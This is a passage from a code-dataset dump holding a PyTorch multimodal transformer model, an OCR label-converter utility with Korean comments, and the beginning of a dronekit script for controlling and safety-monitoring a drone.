forward(self, x, sublayer):\n residual = x\n\n _x_list = []\n _x = torch.chunk(x, self.modal_num, -1)\n for i in range(self.modal_num):\n _x_list.append(self.norm[i](_x[i]))\n x = torch.cat(_x_list, dim=-1)\n\n return self.dropout(sublayer(x)) + residual\n\n\nclass EncoderLayer(nn.Module):\n\n def __init__(self, size, self_attn, feed_forward, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = nn.ModuleList()\n self.sublayer.append(SublayerConnection(size, dropout))\n self.sublayer.append(SublayerConnection(size, dropout))\n\n self.size = size\n\n def forward(self, x, mask):\n\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\n\nclass MultiModalEncoderLayer(nn.Module):\n\n def __init__(self, size, modal_num, mm_atten, mt_atten, feed_forward, dropout):\n super(MultiModalEncoderLayer, self).__init__()\n self.modal_num = modal_num\n\n self.mm_atten = mm_atten\n self.mt_atten = mt_atten\n self.feed_forward = feed_forward\n\n mm_sublayer = MultiModalSublayerConnection(size, modal_num, dropout)\n mt_sublayer = nn.ModuleList()\n for i in range(modal_num):\n mt_sublayer.append(SublayerConnection(size, dropout))\n ff_sublayer = nn.ModuleList()\n for i in range(modal_num):\n ff_sublayer.append(SublayerConnection(size, dropout))\n\n self.sublayer = nn.ModuleList()\n self.sublayer.append(mm_sublayer)\n self.sublayer.append(mt_sublayer)\n self.sublayer.append(ff_sublayer)\n\n self.size = size\n\n def forward(self, x, mask):\n x = self.sublayer[0](x, lambda x: self.mm_atten(x, x, x))\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n feature = self.sublayer[1][i](_x[i], lambda x: self.mt_atten[i](x, x, x, mask[i]))\n feature = self.sublayer[2][i](feature, self.feed_forward[i])\n _x_list.append(feature)\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\ndef attention(query, key, value, mask=None, dropout=None):\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n\n self.d_k = d_model // h\n self.h = h\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, mask=None):\n\n if mask is not None:\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n\n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n\n x, _ = attention(query, key, value, mask=mask, dropout=self.dropout)\n\n x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\n\nclass MultiModalAttention(nn.Module):\n def __init__(self, h, d_model, modal_num, dropout=0.1):\n\n super(MultiModalAttention, self).__init__()\n assert d_model % h == 0\n\n self.d_k = d_model // h\n self.h = h\n\n self.modal_num = modal_num\n self.mm_linears = nn.ModuleList()\n for i in range(self.modal_num):\n linears = clones(nn.Linear(d_model, d_model), 4)\n self.mm_linears.append(linears)\n\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, 
value, mask=None):\n query = torch.chunk(query, self.modal_num, dim=-1)\n key = torch.chunk(key, self.modal_num, dim=-1)\n value = torch.chunk(value, self.modal_num, dim=-1)\n\n if mask is not None:\n mask = mask.unsqueeze(1)\n nbatches = query[0].size(0)\n\n _query_list = []\n _key_list = []\n _value_list = []\n for i in range(self.modal_num):\n _query_list.append(self.mm_linears[i][0](query[i]).view(nbatches, -1, self.h, self.d_k))\n _key_list.append(self.mm_linears[i][1](key[i]).view(nbatches, -1, self.h, self.d_k))\n _value_list.append(self.mm_linears[i][2](value[i]).view(nbatches, -1, self.h, self.d_k))\n\n mm_query = torch.stack(_query_list, dim=-2)\n mm_key = torch.stack(_key_list, dim=-2)\n mm_value = torch.stack(_value_list, dim=-2)\n x, _ = attention(mm_query, mm_key, mm_value, mask=mask, dropout=self.dropout)\n\n x = x.transpose(-2, -3).contiguous().view(nbatches, -1, self.modal_num, self.h * self.d_k)\n _x = torch.chunk(x, self.modal_num, dim=-2)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.mm_linears[i][-1](_x[i].squeeze()))\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\nclass PositionwiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\n\nclass SEmbeddings(nn.Module):\n def __init__(self, d_model, dim):\n super(SEmbeddings, self).__init__()\n self.lut = nn.Linear(dim, d_model)\n self.d_model = d_model\n\n def forward(self, x):\n x = self.lut(x)\n x = x * math.sqrt(self.d_model)\n return x\n\n\nclass TEmbeddings(nn.Module):\n def __init__(self, opts, dim):\n super(TEmbeddings, self).__init__()\n self.levels = opts.levels\n self.ksize = opts.ksize\n self.d_model = opts.d_model\n self.dropout = opts.dropout\n\n self.channel_sizes = [self.d_model] * self.levels\n self.lut = TemporalConvNet(dim, self.channel_sizes, kernel_size=self.ksize, dropout=self.dropout)\n\n def forward(self, x):\n x = self.lut(x.transpose(1, 2)).transpose(1, 2) * math.sqrt(self.d_model)\n\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len).unsqueeze(1)\n v = torch.arange(0, d_model, 2).type(torch.float)\n v = v * -(math.log(1000.0) / d_model)\n div_term = torch.exp(v)\n pe[:, 0::2] = torch.sin(position.type(torch.float) * div_term)\n pe[:, 1::2] = torch.cos(position.type(torch.float) * div_term)\n pe = pe.unsqueeze(0).to(device)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\n\nclass ProcessInput(nn.Module):\n def __init__(self, opts, dim):\n super(ProcessInput, self).__init__()\n\n if opts.embed == 'spatial':\n self.Embeddings = SEmbeddings(opts.d_model, dim)\n elif opts.embed == 'temporal':\n self.Embeddings = TEmbeddings(opts, dim)\n self.PositionEncoding = PositionalEncoding(opts.d_model, opts.dropout_position, max_len=5000)\n\n def forward(self, x):\n return self.PositionEncoding(self.Embeddings(x))\n\n\nclass TE(nn.Module):\n\n def __init__(self, opts, num_features):\n super(TE, self).__init__()\n\n self.modal_num = opts.modal_num\n assert self.modal_num == 1, 'TE model is only used for single 
feature streams ...'\n\n self.mask_a_length = int(opts.mask_a_length)\n self.mask_b_length = int(opts.mask_b_length)\n\n self.N = opts.block_num\n self.dropout = opts.dropout\n self.h = opts.h\n self.d_model = opts.d_model\n self.d_ff = opts.d_ff\n\n self.input = ProcessInput(opts, num_features)\n\n self.regress = nn.Sequential(\n nn.Linear(self.d_model, self.d_model // 2),\n nn.ReLU(),\n nn.Linear(self.d_model // 2, opts.ntarget)\n )\n self.dropout_embed = nn.Dropout(p=opts.dropout_embed)\n\n encoder_layer = nn.ModuleList()\n for i in range(self.N):\n atten = MultiHeadedAttention(self.h, self.d_model, self.dropout)\n ff = PositionwiseFeedForward(self.d_model, self.d_ff, self.dropout)\n encoder_layer.append(EncoderLayer(self.d_model, atten, ff, self.dropout))\n self.te = Encoder(encoder_layer, self.N)\n\n for p in self.te.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.input.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.regress.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, x):\n x = self.input(x)\n x = self.dropout_embed(x)\n\n mask = generate_mask_bidirectional(x.shape[1], self.mask_a_length, self.mask_b_length)\n x = self.te(x, mask)\n\n return self.regress(x)\n\n\nclass TEMMA(nn.Module):\n\n def __init__(self, opts, num_features):\n super(TEMMA, self).__init__()\n\n self.modal_num = opts.modal_num\n assert self.modal_num > 1, 'TEMMA model is only used for multiple feature streams ...'\n\n self.mask_a_length = [int(l) for l in opts.mask_a_length.split(',')]\n self.mask_b_length = [int(l) for l in opts.mask_b_length.split(',')]\n\n self.num_features = num_features\n self.modal_num = opts.modal_num\n self.N = opts.block_num\n self.dropout_mmatten = opts.dropout_mmatten\n self.dropout_mtatten = opts.dropout_mtatten\n self.dropout_ff = opts.dropout_ff\n self.dropout_subconnect = opts.dropout_subconnect\n self.h = opts.h\n self.h_mma = opts.h_mma\n self.d_model = opts.d_model\n self.d_ff = opts.d_ff\n\n self.input = nn.ModuleList()\n for i in range(self.modal_num):\n self.input.append(ProcessInput(opts, num_features // self.modal_num))\n self.dropout_embed = nn.Dropout(p=opts.dropout_embed)\n\n multimodal_encoder_layer = nn.ModuleList()\n for i in range(self.N):\n mm_atten = MultiModalAttention(self.h_mma, self.d_model, self.modal_num, self.dropout_mmatten)\n mt_atten = nn.ModuleList()\n ff = nn.ModuleList()\n for j in range(self.modal_num):\n mt_atten.append(MultiHeadedAttention(self.h, self.d_model, self.dropout_mtatten))\n ff.append(PositionwiseFeedForward(self.d_model, self.d_ff, self.dropout_ff))\n multimodal_encoder_layer.append(MultiModalEncoderLayer(self.d_model, self.modal_num, mm_atten, mt_atten, ff, self.dropout_subconnect))\n\n self.temma = MultiModalEncoder(multimodal_encoder_layer, self.N, self.modal_num)\n self.regress = nn.Sequential(\n nn.Linear(self.d_model * self.modal_num, self.d_model * self.modal_num // 2),\n nn.ReLU(),\n nn.Linear(self.d_model * self.modal_num // 2, opts.ntarget)\n )\n\n for p in self.temma.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.input.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.regress.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, x):\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.input[i](_x[i]))\n x = torch.cat(_x_list, dim=-1)\n\n x = self.dropout_embed(x)\n\n mask = 
[]\n for i in range(self.modal_num):\n mask.append(generate_mask_bidirectional(x.shape[1], self.mask_a_length[i], self.mask_b_length[i]))\n x = self.temma(x, mask)\n\n return self.regress(x)\n","repo_name":"Sunner4nwpu/TEMMA","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15384,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"19963017914","text":"import torch\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nclass CTCLabelConverter(object):\n \"\"\" Convert between text-label and text-index \"\"\"\n\n def __init__(self, character):\n # character (str): set of the possible characters.\n dict_character = list(character)\n\n self.dict = {}\n for i, char in enumerate(dict_character):\n # NOTE: 0 is reserved for the 'CTCblank' token required by CTCLoss.\n self.dict[char] = i + 1\n\n self.character = ['[CTCblank]'] + dict_character # dummy '[CTCblank]' token for CTCLoss (index 0),\n # i.e. the blank at index 0 followed by the character set\n\n def encode(self, text, batch_max_length=25):\n \"\"\"Convert text-labels into text-indices.\n input:\n text: text labels of each image. [sig_size]\n batch_max_length: max length of a text label in the batch. 25 by default\n\n output:\n text: text indices for CTCLoss. [batch_size, batch_max_length] \n length: length of each text. [sig_size]\n \"\"\"\n length = [len(s) for s in text] # store the length of each text label\n\n # The index used for padding (=0) does not affect the CTC loss calculation;\n # every label gets the same length and the spare positions are filled with 0.\n batch_text = torch.LongTensor(len(text), batch_max_length).fill_(0)\n for i, t in enumerate(text):\n text = list(t)\n text = [self.dict[char] for char in text]\n batch_text[i][:len(text)] = torch.LongTensor(text)\n return (batch_text.to(device), torch.IntTensor(length).to(device))\n\n def decode(self, text_index, length):\n \"\"\" Convert text-index into text-label. \"\"\"\n texts = []\n for index, l in enumerate(length):\n t = text_index[index, :]\n\n char_list = []\n for i in range(l): \n if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])): # remove repeated characters and blanks.\n char_list.append(self.character[t[i]])\n text = ''.join(char_list)\n\n texts.append(text)\n return texts\n\n\nclass CTCLabelConverterForBaiduWarpctc(object):\n \"\"\" Convert between text-label and text-index for baidu warpctc \"\"\"\n\n def __init__(self, character):\n # character (str): set of the possible characters.\n dict_character = list(character)\n\n self.dict = {}\n for i, char in enumerate(dict_character):\n # NOTE: 0 is reserved for 'CTCblank' token required by CTCLoss\n self.dict[char] = i + 1\n\n self.character = ['[CTCblank]'] + dict_character # dummy '[CTCblank]' token for CTCLoss (index 0)\n\n def encode(self, text, batch_max_length=25):\n \"\"\"Convert text-labels into text-indices.\n input:\n text: text labels of each image. [sig_size]\n output:\n text: concatenated text indices for CTCLoss.\n [sum(text_index_0)] = [text_index_0 + text_index_1 + ... + text_index_(n - 1)]\n length: length of each text. [sig_size]\n \"\"\"\n length = [len(s) for s in text]\n text = ''.join(text)\n text = [self.dict[char] for char in text]\n\n return (torch.IntTensor(text), torch.IntTensor(length))\n\n def decode(self, text_index, length):\n \"\"\" Convert text-index into text-label. \"\"\"\n
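 # Example of the CTC collapse rule (illustrative values): with\n # self.character = ['[CTCblank]', 'a', 'b'], the index stream\n # [1, 1, 0, 2, 2] decodes to \"ab\": repeats merge, blanks (0) drop.\n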
\"\"\"\n texts = []\n index = 0\n for l in length:\n t = text_index[index:index + l]\n\n char_list = []\n for i in range(l):\n if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])): # 반복된 문자와 공백을 제거합니다.\n char_list.append(self.character[t[i]])\n text = ''.join(char_list)\n\n texts.append(text)\n index += l\n return texts\n\n\nclass AttnLabelConverter(object):\n \"\"\" Convert between text-label and text-index \"\"\"\n\n def __init__(self, character):\n # character (str): 사용 가능한 문자 집합.\n # [GO] 주의 디코더의 시작 토큰입니다. [s] 토큰을 사용할 수 있습니다. \n # [GO]는 시작 토큰, 대응 인덱스 0, [s]는 종료 토큰, 대응 인덱스 1\n list_token = ['[GO]', '[s]'] # ['[s]','[UNK]','[PAD]','[GO]']\n list_character = list(character)\n self.character = list_token + list_character\n\n self.dict = {}\n for i, char in enumerate(self.character):\n # print(i, char)\n self.dict[char] = i\n\n def encode(self, text, batch_max_length=25):\n \"\"\" 텍스트 레이블을 텍스트 색인으로 변환합니다.\n input:\n text: text labels of each image. [batch_size] 각 요소는 문자열입니다.\n batch_max_length: 배치에 포함된 텍스트 레이블의 최대 길이. 기본적으로 25\n\n output:\n text : 주의 디코더 입력. [batch_size x (max_length+2)] [GO] 토큰의 경우 +1이고 [s] 토큰의 경우 +1입니다.\n text[:, 0]은 [GO] 토큰이고 텍스트는 [s] 토큰 뒤에 [GO] 토큰으로 채워집니다.\n length : [s] 토큰도 카운트하는 주의 디코더의 출력 길이입니다. [3, 7, …] [sig_size]\n attention의 경우 출력 라벨은 \"03534534610000...\"입니다. 여기서 0은 GO, 1은 S, S는 모두 GO로 채워집니다. 길이batch_max_length + 2로\n \"\"\"\n length = [len(s) + 1 for s in text] # 문장 끝에 [s]에 대해 +1입니다. [GO]不需要计入长度\n # batch_max_length = max(length) # 다중 모드 설정에는 허용되지 않습니다.\n batch_max_length += 1\n # 첫 번째 단계에서 [GO]에 대해 +1을 추가합니다. batch_text는 [s] 토큰 뒤에 [GO] 토큰으로 패딩됩니다. [s]之后的用[GO]也就是0补齐\n batch_text = torch.LongTensor(len(text), batch_max_length + 1).fill_(0) #길이가 batch_max_length + 2인 것과 같습니다\n for i, t in enumerate(text):\n text = list(t)\n text.append('[s]')\n text = [self.dict[char] for char in text] \n batch_text[i][1:1 + len(text)] = torch.LongTensor(text) # batch_text[:, 0] = [GO] token\n return (batch_text.to(device), torch.IntTensor(length).to(device)) #length 벡터의 길이는 batch_max_length + 1입니다. 즉, [GO]는 길이를 포함하지 않습니다.\n\n def decode(self, text_index, length): # length는 attention에서 사용할 수 없고 CTCloss에서 사용할 수 있습니다. 포맷을 통일합니다.\n \"\"\" convert text-index into text-label. 
\"\"\"\n texts = []\n for index, l in enumerate(length):\n text = ''.join([self.character[i] for i in text_index[index, :]])\n texts.append(text)\n return texts\n\n\nclass Averager(object):\n \"\"\"토치의 평균을 계산합니다.손실 평균에 사용되는 텐서.\"\"\"\n\n def __init__(self):\n self.reset()\n\n def add(self, v):\n count = v.data.numel() # 텐서 속 원소의 수를 되돌리면 loss는 1이 된다.\n v = v.data.sum() # Tensor의 모든 원소의 합을 되돌리는 것은 loss에 있어서 loss 자체의 값이다.\n self.n_count += count\n self.sum += v\n\n def reset(self):\n self.n_count = 0\n self.sum = 0\n\n def val(self):\n res = 0\n if self.n_count != 0:\n res = self.sum / float(self.n_count)\n return res\n","repo_name":"dudco0040/dudco0040","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12399566346","text":"## Functions\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nfrom pymavlink import mavutil\nimport time\nimport geopy\nimport geopy.distance\nfrom geopy.distance import great_circle\nimport math\nimport threading\nimport zmq\n# import io\n# import picamera\n# import struct\ncontext = zmq.Context() # Create a ZeroMQ context\nimport time\nimport json\nimport wiringpi\n\n# use 'GPIO naming'\nwiringpi.wiringPiSetupGpio()\n\n# set #18 to be a PWM output\nwiringpi.pinMode(18, wiringpi.GPIO.PWM_OUTPUT)\n\n# set the PWM mode to milliseconds stype\nwiringpi.pwmSetMode(wiringpi.GPIO.PWM_MODE_MS)\n\n# divide down clock\nwiringpi.pwmSetClock(192)\nwiringpi.pwmSetRange(2000)\n\nd1 = None\nd2 = None\nselected_drone = None\nMCU_host = '192.168.207.122'\nCD1_host = '192.168.207.43'\nCD2_host = '192.168.207.225'\nCD3_host = CD2_host\ncmd_port = 12345\nctrl_port = 54321\ndrone_list = []\nwait_for_command = True\nimmediate_command_str = None\nmissions = {}\n\nclass Drone:\n \n def __init__(self,name,connection_string, baud=None):\n self.vehicle = connect(connection_string, baud = baud)\n self.drone_user = connection_string\n self.drone_baud = baud\n self.name = name\n self.posalt = 2\n self.in_air = False\n self.no_vel_cmds = True\n self.pid_velx = {'P': 0.8, 'I': 0.0, 'D': 0.1}\n self.pid_vely = {'P': 0.8, 'I': 0.0, 'D': 0.1}\n self.pid_velz = {'P': 0.5, 'I': 0.0, 'D': 0.1}\n self.prev_error_velx = 0.0\n self.prev_error_vely = 0.0\n self.prev_error_velz = 0.0\n self.integral_velx = 0.0\n self.integral_vely = 0.0\n self.integral_velz = 0.0\n self.alt_ach = False\n self.prev_timestamp = time.time()\n\n\n def is_wifi_connected(self):\n try:\n wifi = context.socket(zmq.REQ)\n wifi.connect('tcp://192.168.207.101:8888')\n\n # Perform the check twice\n poller = zmq.Poller()\n poller.register(wifi, zmq.POLLIN)\n wifi.send_string(\"check\")\n\n if poller.poll(3000):\n response1 = wifi.recv_string()\n wifi.send_string(\"check\")\n if poller.poll(3000):\n response2 = wifi.recv_string()\n wifi.send_string(\"check\")\n if poller.poll(3000):\n response3 = wifi.recv_string()\n\n if response1 == \"Connected\" or response2 == \"Connected\" or response3 == \"Connected\":\n return True\n else:\n return False\n\n except Exception as e:\n print(f\"Error checking Wi-Fi: {e}\")\n return False\n\n finally:\n if wifi:\n wifi.close()\n\n\n def poshold_guided(self):\n while True:\n try:\n self.altitude = self.vehicle.location.global_relative_frame.alt\n velx = self.vehicle.velocity[0]\n vely = self.vehicle.velocity[1]\n velz = self.vehicle.velocity[2]\n if self.in_air:\n if self.no_vel_cmds:\n current_timestamp = time.time()\n dt = current_timestamp - 
\n self.prev_timestamp = current_timestamp\n # Use PID controllers for velx and vely\n pid_output_velx = self.calculate_pid_output(velx, self.pid_velx, 'velx',dt)\n pid_output_vely = self.calculate_pid_output(vely, self.pid_vely, 'vely',dt)\n pid_output_velz = self.calculate_pid_output(velz, self.pid_velz, 'velz',dt)\n if pid_output_velx > 2:\n pid_output_velx = 2\n if pid_output_vely > 2:\n pid_output_vely = 2\n if pid_output_velx < -2:\n pid_output_velx = -2\n if pid_output_vely < -2:\n pid_output_vely = -2\n if pid_output_velz > 2:\n pid_output_velz = 2\n if pid_output_velz < -2:\n pid_output_velz = -2\n\n self.send_ned_velocity_drone(pid_output_velx, pid_output_vely, pid_output_velz)\n time.sleep(0.2)\n if not self.in_air:\n break\n\n \n except Exception as e:\n log(\"Poshold_Guided Error: {}\".format(e))\n
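 # A compact alternative to the six clamp statements above would be a small\n # helper (hypothetical, same behaviour):\n #\n # def clamp(value, limit=2.0):\n # return max(-limit, min(limit, value))\n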
Initiating landing.\".format(self.name))\n self.land()\n if self.battery < 10.5:\n log(\"sec {} Battery LOW, Landing\".format(self.name))\n self.land()\n time.sleep(4)\n except Exception as e:\n log(\"sec {} Security Error : {}\".format(self.name,e))\n pass\n\n def reconnect(self):\n try:\n self.vehicle.close()\n self = None\n time.sleep(2)\n log(\"Reconnected Successfully\")\n except Exception as e:\n log(f\"Error during reconnection: {e}\")\n\n def arm(self, mode='GUIDED'):\n try:\n log(\"Arming motors\")\n self.vehicle.mode = VehicleMode(mode)\n self.vehicle.armed = True\n TIMEOUT_SECONDS = 10\n start_time = time.time()\n while not self.vehicle.armed:\n log(\"Waiting for Arming\")\n self.vehicle.armed = True\n if time.time() - start_time > TIMEOUT_SECONDS:\n break\n time.sleep(1)\n\n log(\"Vehicle Armed\")\n except Exception as e:\n log(f\"Error during arming: {e}\")\n\n def takeoff(self, alt=2):\n try:\n self.arm()\n log(\"Taking off!\")\n self.vehicle.simple_takeoff(alt)\n start_time = time.time()\n TIMEOUT_SECONDS = 15\n self.posalt = alt\n while True:\n current_altitude = self.vehicle.location.global_relative_frame.alt\n if current_altitude is not None:\n log(\" Altitude: {}\".format(current_altitude))\n if current_altitude >= 1 * 0.9:\n log(\"Reached target altitude\")\n break\n else:\n log(\"Waiting for altitude information...\")\n if time.time() - start_time > TIMEOUT_SECONDS:\n break\n time.sleep(1)\n self.in_air = True\n self.alt_ach = False\n except Exception as e:\n log(f\"Error during takeoff: {e}\")\n\n def send_ned_velocity_drone(self, velocity_x, velocity_y, velocity_z):\n try:\n velocity_x = float(velocity_x)\n velocity_y = float(velocity_y)\n velocity_z = float(velocity_z)\n\n msg = self.vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame\n 0b0000111111000111, # type_mask (only speeds enabled)\n 0, 0, 0, # x, y, z positions (not used)\n velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n\n self.vehicle.send_mavlink(msg)\n log(\"Drone Velocity : {}, {}, {}\".format(velocity_x,velocity_y,velocity_z))\n\n except Exception as e:\n log(f\"Error sending velocity commands: {e}\")\n\n def send_ned_velocity(self, x, y, z, duration = None):\n self.no_vel_cmds = False\n if duration:\n for i in range(0,duration):\n self.send_ned_velocity_drone(x,y,z)\n log(i)\n time.sleep(1)\n\n self.send_ned_velocity_drone(0,0,0)\n time.sleep(1)\n self.no_vel_cmds = True\n \n else:\n self.send_ned_velocity_drone(x,y,z)\n time.sleep(1)\n self.no_vel_cmds = True\n\n def yaw(self, heading):\n try:\n current_heading = self.vehicle.heading\n log(\"Current Heading : {}\".format(current_heading))\n if heading - current_heading <= 0:\n rotation = 1\n else:\n rotation = -1\n estimatedTime = heading / 30.0 + 1\n\n msg = self.vehicle.message_factory.command_long_encode(\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_CMD_CONDITION_YAW, # command\n 0, # confirmation\n heading, # param 1, yaw in degrees\n 0, # param 2, yaw speed deg/s\n rotation, # param 3, direction -1 ccw, 1 cw\n 0, # param 4, relative offset 1, absolute angle 0\n 0, 0, 0) # param 5 ~ 7 not used\n # send command to vehicle\n self.vehicle.send_mavlink(msg)\n\n # Wait sort of time for the command to be fully executed.\n for t in range(0, 
\n def yaw(self, heading):\n try:\n current_heading = self.vehicle.heading\n log(\"Current Heading : {}\".format(current_heading))\n if heading - current_heading <= 0:\n rotation = 1\n else:\n rotation = -1\n estimatedTime = heading / 30.0 + 1\n\n msg = self.vehicle.message_factory.command_long_encode(\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_CMD_CONDITION_YAW, # command\n 0, # confirmation\n heading, # param 1, yaw in degrees\n 0, # param 2, yaw speed deg/s\n rotation, # param 3, direction -1 ccw, 1 cw\n 0, # param 4, relative offset 1, absolute angle 0\n 0, 0, 0) # param 5 ~ 7 not used\n # send command to vehicle\n self.vehicle.send_mavlink(msg)\n\n # Wait some time for the command to be fully executed.\n for t in range(0, int(math.ceil(estimatedTime))):\n time.sleep(1)\n log('{} - Executed yaw(heading={}) for {} seconds.'.format(time.ctime(), heading, t + 1))\n except Exception as e:\n log(f\"Error during yaw command: {e}\")\n\n def servo(self, cmd):\n # Sweep the PWM pulse width gradually so the servo moves smoothly.\n delay_period = 0.01\n try:\n if cmd == 'close':\n for pulse in range(50, 250, 1):\n wiringpi.pwmWrite(18, pulse)\n time.sleep(delay_period)\n elif cmd == 'open':\n for pulse in range(250, 50, -1):\n wiringpi.pwmWrite(18, pulse)\n time.sleep(delay_period)\n log('setting servo to {}'.format(cmd))\n except Exception as e:\n log(f\"Error during servo command: {e}\")\n\n def disarm(self):\n try:\n log(\"Disarming motors\")\n self.vehicle.armed = False\n\n while self.vehicle.armed:\n log(\"Waiting for disarming...\")\n self.vehicle.armed = False\n time.sleep(1)\n\n log(\"Vehicle Disarmed\")\n except Exception as e:\n log(f\"Error during disarming: {e}\")\n\n def land(self):\n try:\n self.vehicle.mode = VehicleMode(\"LAND\")\n log(\"Landing\")\n self.in_air = False\n except Exception as e:\n log(f\"Error during landing: {e}\")\n\n def poshold(self):\n try:\n self.vehicle.mode = VehicleMode(\"POSHOLD\")\n log(\"Drone currently in POSHOLD\")\n except Exception as e:\n log(f\"Error during POSHOLD mode setting: {e}\")\n\n def rtl(self):\n try:\n self.vehicle.mode = VehicleMode(\"RTL\")\n log(\"Drone currently in RTL\")\n self.in_air = False\n except Exception as e:\n log(f\"Error during RTL mode setting: {e}\")\n\n def exit(self):\n try:\n self.vehicle.close()\n except Exception as e:\n log(f\"Error during vehicle exit: {e}\")\n\n def get_vehicle_state(self):\n try:\n log_msg = (\n '{} - Checking current Vehicle Status:\\n'\n ' Global Location: lat={}, lon={}, alt(above sea level)={}\\n'\n ' Global Location (relative altitude): lat={}, lon={}, alt(relative)={}\\n'\n ' Local Location(NED coordinate): north={}, east={}, down={}\\n'\n ' Velocity: Vx={}, Vy={}, Vz={}\\n'\n ' GPS Info: fix_type={}, num_sat={}\\n'\n ' Battery: voltage={}V, current={}A, level={}%\\n'\n ' Heading: {} (degrees from North)\\n'\n ' Groundspeed: {} m/s\\n'\n ' Airspeed: {} m/s'\n ).format(\n time.ctime(),\n self.vehicle.location.global_frame.lat, self.vehicle.location.global_frame.lon,\n self.vehicle.location.global_frame.alt,\n self.vehicle.location.global_relative_frame.lat, self.vehicle.location.global_relative_frame.lon,\n self.vehicle.location.global_relative_frame.alt,\n self.vehicle.location.local_frame.north, self.vehicle.location.local_frame.east,\n self.vehicle.location.local_frame.down,\n self.vehicle.velocity[0], self.vehicle.velocity[1], self.vehicle.velocity[2],\n self.vehicle.gps_0.fix_type, self.vehicle.gps_0.satellites_visible,\n self.vehicle.battery.voltage, self.vehicle.battery.current, self.vehicle.battery.level,\n self.vehicle.heading, self.vehicle.groundspeed, self.vehicle.airspeed\n )\n\n log(log_msg)\n\n\n except Exception as e:\n log(f\"Error getting vehicle state: {e}\")\n\n def goto(self, l, alt, groundspeed=0.7):\n try:\n log('\\n')\n log('{} - Calling goto_gps_location_relative(lat={}, lon={}, alt={}, groundspeed={}).'.format(\n time.ctime(), l[0], l[1], alt, groundspeed))\n destination = LocationGlobalRelative(l[0], l[1], alt)\n log('{} - Before calling goto_gps_location_relative(), vehicle state is:'.format(time.ctime()))\n self.get_vehicle_state()\n current_lat = self.vehicle.location.global_relative_frame.lat\n current_lon = self.vehicle.location.global_relative_frame.lon\n current_alt = 
self.vehicle.location.global_relative_frame.alt\n while ((self.distance_between_two_gps_coord((current_lat, current_lon), l) > 0.5) or (\n abs(current_alt - alt) > 0.3)):\n self.vehicle.simple_goto(destination, groundspeed=groundspeed)\n time.sleep(0.5)\n current_lat = self.vehicle.location.global_relative_frame.lat\n current_lon = self.vehicle.location.global_relative_frame.lon\n current_alt = self.vehicle.location.global_relative_frame.alt\n log('{} - Horizontal distance to destination: {} m.'.format(time.ctime(),\n self.distance_between_two_gps_coord(\n (current_lat, current_lon), l)))\n log('{} - Perpendicular distance to destination: {} m.'.format(time.ctime(),\n current_alt - alt))\n log('{} - After calling goto_gps_location_relative(), vehicle state is:'.format(time.ctime()))\n self.get_vehicle_state()\n except Exception as e:\n log(f\"Error during goto command: {e}\")\n\n def distance_between_two_gps_coord(self, point1, point2):\n try:\n distance = great_circle(point1, point2).meters\n return 